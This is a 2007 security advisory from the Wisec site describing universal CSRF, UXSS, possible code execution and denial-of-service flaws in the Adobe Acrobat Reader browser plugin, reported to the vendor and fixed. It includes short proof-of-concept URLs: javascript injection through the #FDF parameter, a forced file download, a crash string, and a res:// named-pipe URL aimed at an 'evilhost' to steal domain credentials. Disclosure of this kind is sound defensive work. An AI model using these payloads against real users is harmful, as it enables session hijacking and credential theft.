Adobe Acrobat Reader Plugin - Multiple Vulnerabilities
Title:
Adobe Acrobat Reader Plugin - Multiple Vulnerabilities
Original Discovery and Research::
Stefano Di Paola
Contribution:
Giorgio Fedon (IE Dos, UXSS Analysis)
Elia Florio (Poc and Code Execution analysis)
Vulnerable:
Adobe Acrobat Reader Plugin <= 7.0.8
Type of Vulnerability:
Multiple (UXSS, UCRSF, Code Execution)
Tested On :
Firefox 1.5.0.7 and Below, 2.0RC2 under Windows XP SP2,
Firefox 1.5.0.7 and Below, 2.0RC2 under Ubuntu 6.06,
Internet Explorer SP2 under Windows XP SP2.
Updated Vulnerable Versions:
- IE 6 on XP SP1 using Acrobat 7 Vulnerable
- IE 6 on XP SP2 using Acrobat 4 Vulnerable
- FireFox 1.5 using Reader 7 Vulnerable
- FireFox 2.x using Reader 7 Vulnerable
- Opera 9.10 using Reader 7 Vulnerable
- Safari on PPC Mac using Acroread 8 Not Vulnerable
Vendor Status:
Vendor Informed on 15 October 2006, Adobe Released a fix on Version 8.0.0
Resources:
Presented at 23rd CCC Congress:
Subverting Ajax,
paper can be dowloaded
here
Summary:
Adobe Acrobat plugin for Mozilla Firefox and IE (acroreader) is able to populate Portable Documents
(PDF files) forms by supplying an external set of datas through the FDF, XML, or XFDF fields.
Implementation of FDF, XML, XFDF
(http://partners.adobe.com/public/developer/en/acrobat/PDFOpenParameters.pdf)
functionalities in Acrobat Reader Plugin is vulnerable to different kind of attacks.
Vulnerability extent changes from browser to browser:
1. Universal CSRF / session riding;
(Mozilla Firefox, Internet Explorer, Opera + Acrobat Reader plugin)
2. UXSS in #FDF, #XML e #XFDF;
(Mozilla Firefox + Acrobat Reader plugin)
3. Possible Remote Code Execution;
(Mozilla Firefox + Acrobat Reader plugin)
4. Denial of Service;
(Internet Explorer + Acrobat Reader plugin)
Description
1. Universal CSRF and session riding
This is probably Adobe related as all tested browsers (IE,Firefox,Opera) where affected.
The issue is that by creating a special link like this:
http://site.com/file.pdf#FDF=http://victim.com/index.html?param=...
automatically Adobe plugin sends a request to 'victim.com' without user interaction asking
for defined page in 'fdf' parameter. This could be used as a Universal Session Riding (aka UCSRF)
attack which is a well known vulnerability.
Note that the same effect is accomplished by using 'xml' and 'xfdf' parameters.
2. UXSS in #FDF, #XML e #XFDF
In addition by using the following request, is possible to execute javascript code
inside Firefox browser:
http://site.com/file.pdf#FDF=javascript:alert('Test Alert')
The previous could be triggered against a site and because of this is a Universal Cross Site
Scripting.
UXSS is a particular type of Cross Site Scripting and has the ability to be triggered
by exploiting flaws inside browsers, instead of leveraging the vulnerabilities against
insecure web sites. It's also possible to force clients to download files by supplying:
http://site.com/file.pdf#FDF=javascript:document.location= 'file://C:/winnt/notepad.exe'
<Alternative_Attack>
Alternative Attack using NamedPipes
- http://www.514.es/2006/10/exploiting_win32_design_flaws.html
In order to steal Domain credentials with explorer :
http://anyhost/file.pdf#fdf=res://\\evilhost\pipe\apipe
and then by applying techniques found in 514.es paper we found
this kind of url and protocol (res://) could be used too.
This means that also Internet Explorer could be abused in conjunction of
Adobe plugin to make attacks on internal LANs and get victims
credentials.
</Alternative_Attack>
3. Possible Remote Code Execution
There is also a possible Remote code Execution by leveraging a memory corruption inside
Firefox by supplying the following request:
http://site.com/file.pdf#FDF=javascript:document.write('jjjjj...');
It's possible to cause a DoubleFree() error and to overwrite part of the Structural
Exception Handler.
Runtime vulnerability analisys
The problem seems to be caused by a "Double MSVCRT.free()" executed by Acrobat plugin.
The routine which cause Firefox to crash is located in the following call to NP_Shutdown().
Elia Florio is credited for Runtime analysis and exploitation.
NB. The POC of this vulnerability won't be released.
4. Denial of Service (Internet Explorer only);
By supplying the following request via the web browser,
it's possible to cause a denial of service in Internet Explorer:
http://site.com/file.pdf#####...(More '#')
The application is waiting for more inputs and allocates more memory.
Solution
Download it to fix the issue.
Thanks to Adobe Psirt people, they where very kind and professional.
Disclaimer
In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use
or spread of this information.
Any use of this information is at the user's own risk.
Florence, 03rd January 2007
Wisec - Un'Idea sviluppata e mantenuta da...
Wisec è scritto e mantenuto da
Stefano Di Paola.
Wisec usa standard aperti, inclusi XHTML, PHP e CSS2.